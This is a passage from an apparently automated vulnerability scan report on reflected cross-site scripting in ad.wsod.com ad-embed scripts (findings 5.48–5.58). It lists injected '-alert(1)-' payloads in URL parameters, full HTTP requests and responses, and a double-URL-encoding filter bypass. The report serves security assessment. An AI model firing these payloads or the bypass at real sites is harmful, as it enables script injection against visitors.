Set-Cookie: i_1=33:1411:992:100:0:40771:1303843012:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:36:52 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 910

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/97000000000044962.1?!9b897'-alert(1)-'1221f18c50f&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74';
               var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
               ret
...[SNIP]...

5.48. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959** [AN parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54622'-alert(1)-'002a9baae46 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=176378880654622'-alert(1)-'002a9baae46&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:16 GMT; path=/
Set-Cookie: i_1=33:1411:790:100:0:40771:1303843036:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:16 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 914

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=176378880654622'-alert(1)-'002a9baae46&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74';
               var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
               return true;
   }
       function wsod_image1411() {
       docum
...[SNIP]...

5.49. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959** [ASID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58bcb'-alert(1)-'b02bf13cdc7 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed7458bcb'-alert(1)-'b02bf13cdc7 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:28 GMT; path=/
Set-Cookie: i_1=33:1411:49:100:0:40771:1303843048:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:28 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 924

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed7458bcb'-alert(1)-'b02bf13cdc7';
               var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
               return true;
   }
       function wsod_image1411() {
       document.write('<a href="//ad.wsod.com/click/8bec9b10
...[SNIP]...

5.50. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959** [PG parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0a79'-alert(1)-'9ef692e406f was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QDa0a79'-alert(1)-'9ef692e406f&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:24 GMT; path=/
Set-Cookie: i_1=33:1411:794:100:0:40771:1303843044:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:24 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 922

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QDa0a79'-alert(1)-'9ef692e406f&ASID=0899181fa77540cfa23c1407b60aed74';
               var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
               return true;
   }
       function wsod_image1411() {
       document.write(
...[SNIP]...

5.51. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959** [TargetID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**

Issue detail

The value of the TargetID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5140d'-alert(1)-'366f24d7955 was submitted in the TargetID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=82312085140d'-alert(1)-'366f24d7955&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:12 GMT; path=/
Set-Cookie: i_1=33:1411:794:100:0:40771:1303843032:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:12 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 922

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=82312085140d'-alert(1)-'366f24d7955&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74';
               var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
               return true;
   }
       function wsod_image14
...[SNIP]...

5.52. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959** [UIT parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**

Issue detail

The value of the UIT request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dc7e5'-alert(1)-'6ddd018aaa was submitted in the UIT parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=Gdc7e5'-alert(1)-'6ddd018aaa&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:07 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:07 GMT; path=/
Set-Cookie: i_1=33:1411:972:100:0:40771:1303843027:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:07 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 913

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=Gdc7e5'-alert(1)-'6ddd018aaa&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74';
               var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
               return true;
   }
       func
...[SNIP]...

5.53. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959** [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82f30'-alert(1)-'9293594230b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303842959**;10,2,154;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Fmarket-news_@2Fdefault.aspx_@3Ffeat%3D2f32cfe1-809c-4c94-91ed-3e58746880aa?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74&82f30'-alert(1)-'9293594230b=1 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:33 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4db02685bd604; expires=Fri, 27-May-2011 18:37:33 GMT; path=/
Set-Cookie: i_1=33:1411:972:100:0:40771:1303843053:B2|33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L; expires=Thu, 26-May-2011 18:37:33 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 917

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74&82f30'-alert(1)-'9293594230b=1';
               var iRM = new Image();
       iRM.src = 'http://view.atdmt.com/action/Scottrade_Remessaging';
               return true;
   }
       function wsod_image1411() {
       document.write('<a href="//ad.wsod.com/click/8bec9b
...[SNIP]...

5.54. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806 [&PID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806

Issue detail

The value of the &PID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49585"-alert(1)-"9386b35fba was submitted in the &PID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=847984949585"-alert(1)-"9386b35fba&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:36:59 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1680

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
to+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1303843019**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=847984949585"-alert(1)-"9386b35fba&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74">
...[SNIP]...

5.55. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806 [AN parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806

Issue detail

The value of the AN request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 92046"-alert(1)-"146c89c17b4 was submitted in the AN parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=176378880692046"-alert(1)-"146c89c17b4&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:12 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
d7fd7c0fb6e6a631357/1411.0.js.120x60/1303843032**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=176378880692046"-alert(1)-"146c89c17b4&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74">
...[SNIP]...

5.56. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806 [ASID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806

Issue detail

The value of the ASID request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 79074"-alert(1)-"90cbbf22942 was submitted in the ASID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed7479074"-alert(1)-"90cbbf22942 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
*;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed7479074"-alert(1)-"90cbbf22942">
...[SNIP]...

5.57. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806 [PG parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806

Issue detail

The value of the PG request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a40e7"-alert(1)-"cba368c8dc7 was submitted in the PG parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QDa40e7"-alert(1)-"cba368c8dc7&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:16 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
e6a631357/1411.0.js.120x60/1303843036**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QDa40e7"-alert(1)-"cba368c8dc7&ASID=0899181fa77540cfa23c1407b60aed74">
...[SNIP]...

5.58. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1411.0.js.120x60/1763788806

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 600fc%2522%253balert%25281%2529%252f%252ff3cc9aebd4f was submitted in the REST URL parameter 2. This input was echoed as 600fc";alert(1)//f3cc9aebd4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357600fc%2522%253balert%25281%2529%252f%252ff3cc9aebd4f/1411.0.js.120x60/1763788806?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=0899181fa77540cfa23c1407b60aed74 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=4db02685bd604; i_1=33:1359:827:0:0:40771:1303842932:B2|33:967:555:0:0:44824:1303567229:L|23:257:845:6:0:44608:1303389835:L

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Tue, 26 Apr 2011 18:37:28 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 1681

   function fpv() {
       try {
           if(navigator.mimeTypes["application/x-shockwave-flash"].enabledPlugin){
               return (navigator.plugins["Shockwave Flash 2.0"] || navigator.plugins["Shockwave Flash"]).descr
...[SNIP]...
<scr'+'ipt type="text/javascr'+'ipt" src="'+wsod.proto+'//ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357600fc";alert(1)//f3cc9aebd4f/1411.0.js.120x60/1303843048**;'+wsod.fp+';'+wsod.w+';'+wsod.h+';'+wsod.loc+'?click=http://g.msn.com/_2AD0003L/97000000000044962.1?!&&PID=8479849&UIT=G&TargetID=8231208&AN=1763788806&PG=INV4QD&ASID=089
...[SNIP]...

